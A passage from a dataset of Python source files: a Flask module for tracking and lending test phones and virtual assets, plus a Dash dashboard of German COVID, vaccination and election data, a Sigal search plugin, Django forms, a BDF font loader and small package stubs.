operator=operator,\n )\n db.session.add(va)\n db.session.commit()\n return 0, None\n except Exception as e:\n current_app.logger.error(str(e))\n return 102, str(e)\n\n @classmethod\n def update(cls, id, asset_id, passwd, administrator, bind_tel, idcard, asset_type, operator):\n try:\n va = VirtualAsset.query.get(id)\n va.asset_id = asset_id\n va.passwd = passwd\n va.administrator = administrator\n va.bind_tel = bind_tel\n va.idcard = idcard\n va.asset_type = asset_type\n va.operator = operator\n db.session.add(va)\n db.session.commit()\n return 0, None\n except Exception as e:\n current_app.logger.error(str(e))\n return 102, str(e)\n\n @classmethod\n def delete(cls, id):\n try:\n va = VirtualAsset.query.get(id)\n if va is None:\n return 0\n va.status = VirtualAsset.DISABLE\n db.session.add(va)\n db.session.commit()\n return 0\n except Exception as e:\n current_app.logger.error(str(e))\n return 105, str(e)\n\n @classmethod\n @transfer2json(\n '?id|!asset_id|!passwd|!administrator|!idcard|!bind_tel|!status|!asset_type|!operator',\n ispagination=True\n )\n def paginate_data(cls, page_size, page_index):\n asset_type = request.args.get('type')\n query = cls._query().filter(VirtualAsset.status != VirtualAsset.DISABLE)\n if asset_type:\n query = query.filter(VirtualAsset.asset_type == int(asset_type))\n count = query.count()\n data = query.order_by(desc(VirtualAsset.id)).limit(\n int(page_size)).offset(int(page_index - 1) * int(page_size)).all()\n return data, count\n\n\nclass PhoneBorrowBusiness(object):\n user_trpc = Trpc('auth')\n\n @classmethod\n def _query(cls):\n return PhoneBorrow.query.add_columns(\n PhoneBorrow.id.label('id'),\n PhoneBorrow.phone_id.label('phone_id'),\n PhoneBorrow.user_list.label('user_list'),\n PhoneBorrow.confirm_userid.label('confirm_userid'),\n func.date_format(PhoneBorrow.creation_time, \"%Y-%m-%d %H:%i:%s\").label('creation_time'),\n func.date_format(PhoneBorrow.modified_time, \"%Y-%m-%d %H:%i:%s\").label('modified_time'),\n )\n\n @classmethod\n @transfer2json('?id|!phone_id|!user_list|!confirm_userid|!creation_time|!modified_time')\n def get_borrow_all(cls):\n phone_borrows = cls._query().all()\n return phone_borrows\n\n @classmethod\n def get_borrow_by_phone_id(cls, phone_id):\n phone_borrow = cls._query().filter(PhoneBorrow.phone_id == phone_id).first()\n return phone_borrow\n\n @classmethod\n def create(cls, phone_id, confirm_userid=0, user_list=''):\n try:\n phone_borrow = PhoneBorrow(\n phone_id=phone_id,\n user_list=user_list,\n confirm_userid=confirm_userid,\n )\n db.session.add(phone_borrow)\n db.session.commit()\n return 0, None\n except Exception as e:\n current_app.logger.error(str(e))\n return 102, str(e)\n\n @classmethod\n def update(cls, id, phone_id, confirm_userid, user_list):\n try:\n phone_borrow = PhoneBorrow.query.get(id)\n if not phone_borrow:\n cls.create(phone_id, confirm_userid, user_list)\n\n phone_borrow.user_list = user_list\n phone_borrow.confirm_userid = confirm_userid\n db.session.add(phone_borrow)\n db.session.commit()\n return 0, None\n except Exception as e:\n current_app.logger.error(e)\n return 102, str(e)\n\n @classmethod\n def clear_borrow_user_list(cls, phone_id, old_holder_id):\n # 清除 申请用户列表\n # 只剩 原持有者 ID\n try:\n old_holder_id = str(old_holder_id)\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n if not phone_borrow:\n ret, msg = cls.create(phone_id, 0, old_holder_id)\n else:\n ret, msg = cls.update(phone_borrow.id, phone_borrow.phone_id, 0, old_holder_id)\n return ret, msg\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n @classmethod\n def add_user_to_confirm(cls, phone_id, user_id):\n # 添加 用户ID 到 当前设备的 接收确认列表\n try:\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n if not phone_borrow:\n ret, msg = cls.create(phone_id, user_id)\n else:\n ret, msg = cls.update(phone_borrow.id, phone_borrow.phone_id, user_id, phone_borrow.user_list)\n return ret, msg\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n @classmethod\n def add_user_to_userlist(cls, phone_id, user_id):\n # 将 申请用户 ID 添加到申请列表\n try:\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n if not phone_borrow:\n cls.create(phone_id)\n\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n old_user_list = [id for id in phone_borrow.user_list.split(',')]\n user_id = str(user_id)\n if user_id not in old_user_list:\n old_user_list.append(user_id)\n else:\n return 103, \"不能重复借用\"\n new_user_list = ','.join(old_user_list)\n cls.update(phone_borrow.id, phone_id, 0, new_user_list)\n return 0, None\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n @classmethod\n @transfer2json(\n '?id|!nickname'\n )\n def get_user_list_by_phone_id(cls, phone_id):\n try:\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n if not phone_borrow:\n return []\n user_list = [id for id in phone_borrow.user_list.split(',')]\n users = []\n for user_id in user_list:\n if len(user_id) > 0:\n user = User.query.get(int(user_id))\n if user:\n users.append(user)\n return users\n except Exception as e:\n current_app.logger.error(str(e))\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n @classmethod\n def send_borrow_msg_qywx(cls, current_phone, phone_holder, current_user):\n\n current_user_nickname = current_user.nickname\n current_user_wx_userid = current_user.wx_userid\n receiver_id = phone_holder.wx_userid\n msg_text = \"\"\"[TCloud] {}({})\n您收到一个设备借用请求:\n借用的设备 : {},\n资产编号 : {},\n借用人 : {} (微信号: {}),\n请通过企业微信沟通,如借出,请通过 TCloud->资产->流转 进行转出。\"\"\".format(phone_holder.nickname, phone_holder.wx_userid,\n current_phone.name, current_phone.asset_id, current_user_nickname,\n current_user_wx_userid)\n PhoneBusiness.qyweixin_email(phone_holder.id, msg_text)\n\n @classmethod\n def send_borrow_continue_msg_qywx(cls, current_phone, phone_holder, current_user):\n deadline = PhoneBusiness.deadline(current_phone)\n current_user_nickname = current_user.nickname\n current_user_wx_userid = current_user.wx_userid\n receiver_id = phone_holder.wx_userid\n msg_text = \"\"\"[TCloud] {} ({})\n您续借了一台设备:\n借用的设备 : {},\n资产编号 : {},\n借用人 : {} (微信号: {})\n可持有时间: {} 天\n到期时间: {}\"\"\".format(phone_holder.nickname, phone_holder.wx_userid,\n current_phone.name, current_phone.asset_id, current_user_nickname, current_user_wx_userid,\n Phone.HOLD_DATE, deadline)\n PhoneBusiness.qyweixin_email(phone_holder.id, msg_text)\n\n @classmethod\n def borrow(cls, phone_id):\n # 发起借用\n try:\n ret, msg = 0, None\n current_phone = Phone.query.get(phone_id)\n if current_phone:\n current_user = User.query.get(g.userid)\n phone_holder = User.query.get(current_phone.borrow_id)\n if current_phone.borrow_id == g.userid:\n ret, msg = PhoneBusiness.move(phone_id, phone_holder.id)\n PhoneBorrowBusiness.send_borrow_continue_msg_qywx(current_phone, phone_holder, current_user)\n else:\n ret, msg = PhoneBorrowBusiness.add_user_to_userlist(phone_id, g.userid)\n if ret == 103:\n return ret, msg\n PhoneBorrowBusiness.send_borrow_msg_qywx(current_phone, phone_holder, current_user)\n else:\n return 101, '设备无效'\n return ret, msg\n except Exception as e:\n current_app.logger.error(traceback.format_exc())\n current_app.logger.error(e)\n return 101, e\n\n @classmethod\n def confirm_borrow(cls, phone_id):\n # 确认借用, admin 确认接收\n try:\n current_phone = Phone.query.get(phone_id)\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n\n if int(phone_borrow.confirm_userid) != g.userid:\n return 403, '只有接收人可以确认'\n\n phone_current_holder = User.query.get(current_phone.borrow_id)\n phone_new_holder = User.query.get(phone_borrow.confirm_userid)\n\n ret, msg = PhoneBusiness.move(phone_id, int(phone_borrow.confirm_userid))\n\n admins = cls.user_trpc.requests('get', '/user/admin')\n current_app.logger.info('{} 确认接收设备'.format(int(phone_borrow.confirm_userid)))\n if (int(phone_borrow.confirm_userid) in admins or\n int(phone_borrow.confirm_userid) == current_phone.creator_id):\n try:\n PhoneBusiness.send_return_confirm_msg_qywx(current_phone, phone_current_holder, phone_new_holder)\n reason = '成功归还了设备 {}({}) '.format(current_phone.name, current_phone.asset_id)\n current_app.logger.info(reason)\n user_old_id = int(phone_borrow.user_list)\n ret, msg = CreditBusiness.add_sub_score(user_old_id, Credit.CREDIT_ADD_ONCE, reason)\n except Exception as e:\n current_app.logger.error(e)\n else:\n PhoneBusiness.send_move_confirm_msg_qywx(current_phone, phone_current_holder, phone_new_holder)\n ret, msg = cls.update(phone_borrow.id, phone_borrow.phone_id, 0, '')\n\n return ret, msg\n except Exception as e:\n current_app.logger.error(str(e))\n current_app.logger.error(traceback.format_exc())\n return 102, e\n"} {"ext": "py", "sha": "1a2efaf4a3af509ee3dcb5e4b2027c195f95038e", "content": "import ConfigParser\nimport importlib\nfrom pkg_resources import resource_string\nimport StringIO\nfrom landmarkrest.util.util import Util\n\n\nclass FieldPredictor(object):\n\n def __init__(self):\n # TODO: use the configuration file determine if we are using InferLink's field typer, or ISI's\n self.__predictor_impl = 'InferLink'\n\n if self.__predictor_impl == 'InferLink':\n self.__section_name = 'Models'\n self.__field_models = self.__load_field_models()\n\n \"\"\"\n End-point function that predicts the type of column that has been extracted (e.g., values extracted\n from multiple pages)\n\n @param preceding_stripes: These are the stripes preceding each of the field values.\n @param field_values: A set of values from multiple pages for the same slot\n @param following_stripes: These are the stripes coming right after the slot values\n @param confidence_threshold: Any column type that is not assigned with at least this level of confidence is\n not returned\n\n @note: The field_values and preceding_stripes should be ordered so they are aligned (e.g., 1st is 1st for both)\n\n @retun: A tuple of (field_name, confidence)\n \"\"\"\n def predict(self, preceding_stripes, slot_values, following_stripes, confidence_threshold=0.0):\n if self.__predictor_impl == 'ISI':\n return {} # TODO: this is where we call ISI's code, however they do it (service, etc.)\n else:\n return self.__inferlink_predict(preceding_stripes, slot_values, following_stripes, confidence_threshold)\n\n def __inferlink_predict(self, preceding_stripes, slot_values, following_stripes, confidence_threshold):\n preds = {}\n for col_type in self.__field_models:\n model = self.__field_models[col_type]\n conf = model.generate_confidence(preceding_stripes, slot_values, following_stripes)\n\n if conf >= confidence_threshold:\n preds[col_type] = conf\n\n top_x = Util.top_x_from_dict(preds, top_x=1)\n argmax = None\n if top_x:\n argmax = top_x[0] # the first one in a one person list\n\n return argmax\n\n def __load_field_models(self):\n self.__field_models = {}\n\n config = ConfigParser.ConfigParser()\n config_buffer = resource_string(__name__, 'config/field_model_configs.cfg')\n buf = StringIO.StringIO(config_buffer)\n config.readfp(buf)\n\n for (attr, value) in config.items(self.__section_name):\n curr_class = importlib.import_module(\"landmarkrest.field_predictor.field_models.%s\" % value)\n instance = getattr(curr_class, value)() # reflection... booya!\n self.__field_models[attr] = instance\n\n return self.__field_models"} {"ext": "py", "sha": "1a2efb6deda8d3f8fe78a1c12cc9f64c492364fd", "content": "from blue_ui import app\n\nif __name__ == \"__main__\":\n app.run()"} {"ext": "py", "sha": "1a2efbb64cbd9e877bddc00983df58326fc5f37a", "content": "from example_system.db_connection_wrapper import db_connection_wrapper\n\n\ndef process_data() -> None:\n pass\n\n\ndef process_data_with_error() -> None:\n raise Exception(\"Something went wrong\")\n\n\ndef run_example() -> None:\n with db_connection_wrapper() as db_connection:\n db_connection.execute(\"SELECT * FROM USERS;\")\n db_connection.execute(\"SELECT * FROM CUSTOMERS;\")\n db_connection.execute(\"INSERT ...\")\n process_data()\n\n with db_connection_wrapper() as db_connection:\n db_connection.execute(\"SELECT * FROM USERS;\")\n db_connection.execute(\"SELECT * FROM CUSTOMERS;\")\n db_connection.execute(\"INSERT ...\")\n process_data_with_error()\n\n\nif __name__ == \"__main__\":\n run_example()\n"} {"ext": "py", "sha": "1a2efce8dbbc7ae3c26f3dadb75d2b8ab84a63e0", "content": "\"\"\"\nsde\n==========\nLicense: BSD, see LICENSE for more details.\n\"\"\"\n\n__author__ = \"Danila Vershinin\"\n\nimport logging\n\nfrom .__about__ import (\n __version__,\n)\n\nfrom .sde import main\nfrom .sde import edit_file, read_file\n\n# https://realpython.com/python-logging-source-code/#library-vs-application-logging-what-is-nullhandler\n# when used as library, we default to opt-in approach, whereas library user have to enable logging\n# from lastversion\nlogging.getLogger(__name__).addHandler(logging.NullHandler())\n\n"} {"ext": "py", "sha": "1a2efd8e13205172124ac138799462ec35f7e1be", "content": "from functools import reduce\nfrom jinja2 import Markup\nimport json\nimport logging\nimport os\nimport shutil\n\nfrom sigal import signals\nfrom sigal.utils import url_from_path\nfrom sigal.writer import AbstractWriter\n\nlogger = logging.getLogger(__name__)\n\nASSETS_PATH = os.path.normpath(\n os.path.join(os.path.abspath(os.path.dirname(__file__)), 'static', 'js'))\n\nclass PageWriter(AbstractWriter):\n '''A writer for writing media pages, based on writer'''\n\n template_file = \"search.html\"\n\n def write(self, album):\n ''' Generate the media page and save it '''\n\n from sigal import __url__ as sigal_link\n\n page = self.template.render({\n 'album': album,\n 'index_title': self.index_title,\n 'settings': self.settings,\n 'sigal_link': sigal_link,\n 'theme': {'name': os.path.basename(self.theme),\n 'url': url_from_path(os.path.relpath(self.theme_path,\n album.dst_path))},\n })\n\n output_file = os.path.join(album.dst_path, 'search.html')\n with open(output_file, 'w', encoding='utf-8') as f:\n f.write(page)\n\ndef generate_search(gallery):\n id = 1\n output_file = os.path.join(gallery.albums['.'].dst_path, 'static/js/search-content.js')\n store = {}\n for album in gallery.albums.values():\n album_titles = \" , \".join([*map(lambda x: x[1], album.breadcrumb)])\n for item in album.medias:\n data = {}\n data['title'] = item.title\n if 'author' in item.meta:\n data['author'] = item.meta['author'][0]\n data['url'] = \"/\" + item.path + \"/\" + item.url\n data['thumbnail'] = item.thumbnail\n data['mime'] = item.mime\n if 'slides' in item.meta:\n data['slides'] = item.meta['slides'][0]\n data['album'] = album_titles;\n store[str(id)] = data\n id = id + 1\n\n with open(output_file, 'w', encoding='utf8') as f:\n f.write(\"window.store = \")\n f.write(json.dumps(store))\n\n writer = PageWriter(gallery.settings, index_title=\"Search Results\")\n writer.write(gallery.albums['.'])\n\n shutil.copyfile(os.path.join(ASSETS_PATH, 'lunr.js'),\n os.path.join(gallery.albums['.'].dst_path, 'static', 'js', 'lunr.js'))\n\ndef register(settings):\n signals.gallery_build.connect(generate_search)\n"} {"ext": "py", "sha": "1a2efe67762125121390d438c4b5fa8951f4f55d", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 12 11:52:04 2021\n\n@author: Sarah\n\"\"\"\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 7 11:30:49 2021\n\n@author: Sarah\n\"\"\"\nimport pandas as pd\nimport pandasql\nimport dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc #this had to be changed\n#from dash import dcc\nimport dash_html_components as html #this as well\n#from dash import html\nimport plotly.express as px\nfrom urllib.request import urlopen\nimport json\n\npd.options.mode.chained_assignment = None # default='warn'\n\n# get vaccination data from rki vaccination github repo:\n# (https://github.com/robert-koch-institut/COVID-19-Impfungen_in_Deutschland)\nurl_vacc_data = \"https://raw.githubusercontent.com/robert-koch-institut/COVID-19-Impfungen_in_Deutschland/master/Aktuell_Deutschland_Impfquoten_COVID-19.csv\"\n# read-in data from csv-file (filter out Deutschland & Bundesressorts)\nvacc_data = pd.read_csv(url_vacc_data, skiprows=[1, 18])\n\n# Open Germany map as GeoJSON\nwith urlopen(\"https://raw.githubusercontent.com/isellsoap/deutschlandGeoJSON/main/2_bundeslaender/2_hoch.geo.json\") as file:\n germany_states = json.load(file)\n\n# Read-in Covid-Data (States)\nwith urlopen(\"https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/Coronaf%C3%A4lle_in_den_Bundesl%C3%A4ndern/FeatureServer/0/query?where=1%3D1&outFields=LAN_ew_AGS,LAN_ew_GEN,Aktualisierung,cases7_bl_per_100k,death7_bl,cases7_bl_per_100k_txt,cases7_bl&outSR=4326&f=json\") as cases_states:\n covid_states = json.load(cases_states)\n\ncovid_data = pd.json_normalize(covid_states, record_path=['features'])\n\n## Read in Voting-Results\nwith urlopen(\"https://raw.githubusercontent.com/julianrosenberger/VisualizationSDU/main/data/kerg2.csv?token=AQYCHUSY2GHUHR23UV3RZU3BYGNO2\") as f:\n data = pd.read_csv(f, delimiter=';', skiprows=9, usecols=['Gebietsnummer', 'Gebietsname', 'UegGebietsnummer', 'Gruppenart', 'Gruppenname', 'Gruppenreihenfolge', 'Stimme',\t'Prozent'])\n\n\n# #Deleting where Gruppenart!=Partei\ndf_clear=data[data.Gruppenart==\"Partei\"]\n\n# deleting Stimme==2:\ndf_clear2 = df_clear[df_clear.Stimme==1]\n\n# Grouped dataframe with only the states 1-16 (both incl.)\ndf_clear3 = df_clear2[df_clear2.Gebietsnummer < 17]\n\n# Make sure Gebietsnummer belongs to state\ndf_clear4 = df_clear3[df_clear3.UegGebietsnummer == 99]\n\n\ndf_clear = df_clear4\n\n# cleaning \nprint(type('Prozent')) # string --> convert to int\n\n#(nan --> 0\ndf_clear['Prozent'] = df_clear['Prozent'].fillna(0)\n\n# , --> .\ndf_clear['Prozent'] = (df_clear['Prozent'].replace(',', '.', regex=True).astype(float))\n\n# string --> int\ndf_clear['Prozent'] = pd.to_numeric(df_clear['Prozent'])\n\n#print(df_clear.to_string())\n\n\n# Gruping by state:\ndf_group = df_clear.groupby('Gebietsnummer')\nprint(df_group)\n#print(df_group['Gebietsnummer'] == 11)\n\nfor key, item in df_group:\n print(df_group.get_group(key))\n\n# Get the indices of the original dataframe to find out which party etc. it belongs to:\n#idx = df_group(['Gebietsnummer'])['Prozent'].transform(max) == df_clear['Prozent']\n#print(idx.head())\n\nmaximums = df_group['Prozent'].max()\n#print(maximums.to_string())\n\n#print(df_clear.loc[df_clear.groupby(['Gebietsnummer'])['Prozent'].idxmax()].reset_index(drop=True))\n\nwinners = df_clear.loc[df_clear.groupby(['Gebietsnummer'])['Prozent'].idxmax()].reset_index(drop=True)\nprint(winners.to_string())\n\n\n\n\n\n\n\n\n\n\n## Plot Vaccination Map\nvacc = px.choropleth_mapbox(\n mapbox_style='white-bg',\n data_frame=vacc_data,\n geojson=germany_states,\n locations='Bundesland',\n featureidkey='properties.name',\n hover_name='Bundesland',\n hover_data={'Bundesland': False,\n 'Impfquote_gesamt_voll': ':.2f%',\n 'Datum': True},\n color='Impfquote_gesamt_voll',\n color_continuous_scale=px.colors.sequential.Blues,\n labels={'Impfquote_gesamt_voll': 'Fully vaccinated', 'Bundesland': 'State', 'Datum': 'Date'}\n )\nvacc.update_mapboxes(\n center_lat=51.5,\n center_lon=10.25,\n zoom=4.6\n)\nvacc.update_layout(\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\n\n## Plot Covid-Map\ncov = px.choropleth_mapbox(\n mapbox_style='white-bg',\n data_frame=covid_data,\n geojson=germany_states,\n locations='attributes.LAN_ew_GEN',\n featureidkey='properties.name',\n hover_name='attributes.LAN_ew_GEN',\n hover_data={'attributes.LAN_ew_GEN': False,\n 'attributes.cases7_bl_per_100k': ':.2f',\n 'attributes.death7_bl': True},\n color='attributes.cases7_bl_per_100k',\n color_continuous_scale=px.colors.sequential.YlOrRd,\n labels={'attributes.cases7_bl_per_100k': '7-day incidence', 'attributes.LAN_ew_GEN': 'State', 'attributes.death7_bl': '7-day deaths'}\n)\ncov.update_layout(\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\ncov.update_mapboxes(\n center_lat=51.5,\n center_lon=10.25,\n zoom=4.6\n)\n\n\n## Plot Voting-results\nvote = px.choropleth_mapbox(\n mapbox_style='white-bg',\n data_frame=winners,\n geojson=germany_states,\n locations='Gebietsname',\n featureidkey='properties.name',\n hover_name='Gebietsname',\n hover_data={'Gebietsname': False,\n 'Gruppenname': True,\n 'Prozent': ':.2f%'},\n color='Gruppenname',\n color_discrete_map={'SPD': \"#E3000F\",\n \"CDU\": \"#32302e\",\n \"CSU\": \"#32302e\",\n \"AfD\": \"#009ee0\"},\n labels={'Gebietsname': 'State', 'Gruppenname': 'Party', 'Prozent': 'Result'}\n)\nvote.update_layout(\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\nvote.update_mapboxes(\n center_lat=51.5,\n center_lon=10.25,\n zoom=4.6\n)\n\n\n## Plot Voting-results in form of pie chart:\n# want for entire Germany, instead of states:\nvote_germ=data[data.Gebietsnummer==99]\nvote_germ = vote_germ[vote_germ.Stimme==1]\nvote_germ=vote_germ[vote_germ.Gruppenart==\"Partei\"]\nvote_germ=vote_germ[vote_germ.Gebietsname==\"Bundesgebiet\"]\n\n# cleaning \n#(nan --> 0\nvote_germ['Prozent'] = vote_germ['Prozent'].fillna(0)\n\n# , --> .\nvote_germ['Prozent'] = (vote_germ['Prozent'].replace(',', '.', regex=True).astype(float))\n\n# string --> int\nvote_germ['Prozent'] = pd.to_numeric(vote_germ['Prozent'])\n\n#print(vote_germ.to_string())\n\n\n\n# 47 different states. Diving into: SPD, CDU/CSU, AfD, and \"Others\":\n#vote_germ.loc[vote_germ['Gruppenname'] == \"CDU\", 'Gruppenname'] = \"CDU/CSU\"\n#vote_germ.loc[vote_germ['Gruppenname'] == \"CSU\", 'Gruppenname'] = \"CDU/CSU\"\n\nvote_germ.loc[vote_germ['Prozent'] < 6, 'Gruppenname'] = \"Other\"\nvote_germ.loc[vote_germ['Gruppenname'] == \"FDP\", 'Gruppenname'] = \"Other\"\nvote_germ.loc[vote_germ['Gruppenname'] == \"GRÜNE\", 'Gruppenname'] = \"Other\"\n\n\n \n \nvote_chart = px.pie(vote_germ, values='Prozent', names='Gruppenname', color='Gruppenname',\n color_discrete_map={'SPD':'#E3000F',\n 'CDU':'32302e',\n 'CSU':'#0080c8',\n 'AfD':'009ee0',\n 'Other':'grey'})\n\n#vote_chart.show()\n\n\n\n\n## Build web app with dash\napp = dash.Dash(__name__)\n\napp.layout = lambda: html.Div([\n # H1-Header\n html.H1(children=\"Does voting against vaccinations mean voting for COVID?\",\n style={'textAlign': 'center', 'fontFamily': 'Helvetica, Arial, sans-serif'}),\n html.Div([\n html.Div([\n dcc.Graph(figure=vacc)\n ], style={'width': '33%', 'float': 'left'}),\n html.Div([\n dcc.Graph(figure=cov)\n ], style={'width': '33%', 'float': 'left'}),\n html.Div([\n dcc.Graph(figure=vote)\n ], style={'width': '33%', 'float': 'left'})\n ]),\n html.Div([\n html.Div([\n dcc.Graph(figure=vacc)\n ], style={'width': '33%', 'float': 'left'}),\n html.Div([\n dcc.Graph(figure=cov)\n ], style={'width': '33%', 'float': 'left'}),\n html.Div([\n dcc.Graph(figure=vote)\n ], style={'width': '33%', 'float': 'left'})\n ])\n])\n\n\nif __name__ == '__main__':\n app.run_server(debug=True, port=8080)\n \n \n \n "} {"ext": "py", "sha": "1a2efe784b6d2430e080b7c557c24993e4843e6d", "content": "# -*- coding: utf-8 -*-\n\n__version__ = '19.9.0.dev1'\n\nPROJECT_NAME = \"galaxy-data\"\nPROJECT_OWNER = PROJECT_USERAME = \"galaxyproject\"\nPROJECT_URL = \"https://github.com/galaxyproject/galaxy\"\nPROJECT_AUTHOR = 'Galaxy Project and Community'\nPROJECT_DESCRIPTION = 'Galaxy Datatype Framework and Datatypes'\nPROJECT_EMAIL = 'galaxy-committers@lists.galaxyproject.org'\nRAW_CONTENT_URL = \"https://raw.github.com/%s/%s/master/\" % (\n PROJECT_USERAME, PROJECT_NAME\n)\n"} {"ext": "py", "sha": "1a2efed9ef854913b615cd765d6fefecf05ed99b", "content": "from __future__ import unicode_literals\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Field, Layout, Submit\nfrom django import forms\nfrom django.contrib.auth import get_user_model\n\nfrom . import models\n\nUser = get_user_model()\n\n\nclass UserForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(UserForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.layout = Layout(\n Field('name'),\n )\n\n class Meta:\n model = User\n fields = ['name']\n\n\nclass ProfileForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(ProfileForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.layout = Layout(\n Field('picture'),\n Field('bio'),\n Submit('update', 'Update', css_class=\"btn-success\"),\n )\n\n class Meta:\n model = models.Profile\n fields = ['picture', 'bio']\n"} {"ext": "py", "sha": "1a2eff72245f196576db87587bf0ecc1b0819cce", "content": "# SPDX-FileCopyrightText: 2019 Scott Shawcroft for Adafruit Industries\n#\n# SPDX-License-Identifier: MIT\n\n\"\"\"\n`adafruit_bitmap_font.bdf`\n====================================================\n\nLoads BDF format fonts.\n\n* Author(s): Scott Shawcroft\n\nImplementation Notes\n--------------------\n\n**Hardware:**\n\n**Software and Dependencies:**\n\n* Adafruit CircuitPython firmware for the supported boards:\n https://github.com/adafruit/circuitpython/releases\n\n\"\"\"\n\nimport gc\nfrom fontio import Glyph\nfrom .glyph_cache import GlyphCache\n\n__version__ = \"1.3.4\"\n__repo__ = \"https://github.com/adafruit/Adafruit_CircuitPython_Bitmap_Font.git\"\n\n\nclass BDF(GlyphCache):\n \"\"\"Loads glyphs from a BDF file in the given bitmap_class.\"\"\"\n\n def __init__(self, f, bitmap_class):\n super().__init__()\n self.file = f\n self.name = f\n self.file.seek(0)\n self.bitmap_class = bitmap_class\n line = self.file.readline()\n line = str(line, \"utf-8\")\n if not line or not line.startswith(\"STARTFONT 2.1\"):\n raise ValueError(\"Unsupported file version\")\n self.point_size = None\n self.x_resolution = None\n self.y_resolution = None\n self._ascent = None\n self._descent = None\n\n @property\n def descent(self):\n \"\"\"The number of pixels below the baseline of a typical descender\"\"\"\n if self._descent is None:\n self.file.seek(0)\n while True:\n line = self.file.readline()\n if not line:\n break\n\n if line.startswith(b\"FONT_DESCENT \"):\n self._descent = int(line.split()[1])\n break\n\n return self._descent\n\n @property\n def ascent(self):\n \"\"\"The number of pixels above the baseline of a typical ascender\"\"\"\n if self._ascent is None:\n self.file.seek(0)\n while True:\n line = self.file.readline()\n line = str(line, \"utf-8\")\n if not line:\n break\n\n if line.startswith(\"FONT_ASCENT \"):\n self._ascent = int(line.split()[1])\n break\n\n return self._ascent\n\n def get_bounding_box(self):\n \"\"\"Return the maximum glyph size as a 4-tuple of: width, height, x_offset, y_offset\"\"\"\n self.file.seek(0)\n while True:\n line = self.file.readline()\n line = str(line, \"utf-8\")\n if not line:\n break\n\n if line.startswith(\"FONTBOUNDINGBOX \"):\n _, x, y, x_offset, y_offset = line.split()\n return (int(x), int(y), int(x_offset), int(y_offset))\n return None\n\n def load_glyphs(self, code_points):\n # pylint: disable=too-many-statements,too-many-branches,too-many-nested-blocks,too-many-locals\n metadata = True\n character = False\n code_point = None\n bytes_per_row = 1\n desired_character = False\n current_info = {}\n current_y = 0\n rounded_x = 1\n if isinstance(code_points, int):\n remaining = set()\n remaining.add(code_points)\n elif isinstance(code_points, str):\n remaining = set(ord(c) for c in code_points)\n elif isinstance(code_points, set):\n remaining = code_points\n else:\n remaining = set(code_points)\n for code_point in remaining.copy():\n if code_point in self._glyphs and self._glyphs[code_point]:\n remaining.remove(code_point)\n if not remaining:\n return\n\n x, _, _, _ = self.get_bounding_box()\n\n self.file.seek(0)\n while True:\n line = self.file.readline()\n if not line:\n break\n if line.startswith(b\"CHARS \"):\n metadata = False\n elif line.startswith(b\"SIZE\"):\n _, self.point_size, self.x_resolution, self.y_resolution = line.split()\n elif line.startswith(b\"COMMENT\"):\n pass\n elif line.startswith(b\"STARTCHAR\"):\n # print(lineno, line.strip())\n # _, character_name = line.split()\n character = True\n elif line.startswith(b\"ENDCHAR\"):\n character = False\n if desired_character:\n bounds = current_info[\"bounds\"]\n shift = current_info[\"shift\"]\n gc.collect()\n self._glyphs[code_point] = Glyph(\n current_info[\"bitmap\"],\n 0,\n bounds[0],\n bounds[1],\n bounds[2],\n bounds[3],\n shift[0],\n shift[1],\n )\n remaining.remove(code_point)\n if not remaining:\n return\n desired_character = False\n elif line.startswith(b\"BBX\"):\n if desired_character:\n _, x, y, x_offset, y_offset = line.split()\n x = int(x)\n y = int(y)\n x_offset = int(x_offset)\n y_offset = int(y_offset)\n current_info[\"bounds\"] = (x, y, x_offset, y_offset)\n current_info[\"bitmap\"] = self.bitmap_class(x, y, 2)\n elif line.startswith(b\"BITMAP\"):\n if desired_character:\n rounded_x = x // 8\n if x % 8 > 0:\n rounded_x += 1\n bytes_per_row = rounded_x\n if bytes_per_row % 4 > 0:\n bytes_per_row += 4 - bytes_per_row % 4\n current_y = 0\n elif line.startswith(b\"ENCODING\"):\n _, code_point = line.split()\n code_point = int(code_point)\n if code_point in remaining:\n desired_character = True\n current_info = {\"bitmap\": None, \"bounds\": None, \"shift\": None}\n elif line.startswith(b\"DWIDTH\"):\n if desired_character:\n _, shift_x, shift_y = line.split()\n shift_x = int(shift_x)\n shift_y = int(shift_y)\n current_info[\"shift\"] = (shift_x, shift_y)\n elif line.startswith(b\"SWIDTH\"):\n pass\n elif character:\n if desired_character:\n bits = int(line.strip(), 16)\n width = current_info[\"bounds\"][0]\n start = current_y * width\n x = 0\n for i in range(rounded_x):\n val = (bits >> ((rounded_x - i - 1) * 8)) & 0xFF\n for j in range(7, -1, -1):\n if x >= width:\n break\n bit = 0\n if val & (1 << j) != 0:\n bit = 1\n current_info[\"bitmap\"][start + x] = bit\n x += 1\n current_y += 1\n elif metadata:\n # print(lineno, line.strip())\n pass\n"} {"ext": "py", "sha": "1a2eff76347edd7feca6555985906f25b58cef71", "content": "from django.apps import AppConfig\n\n\nclass AliasConfig(AppConfig):\n name = 'alias'\n\n def ready(self):\n import alias.signals\n"} {"ext": "py", "sha": 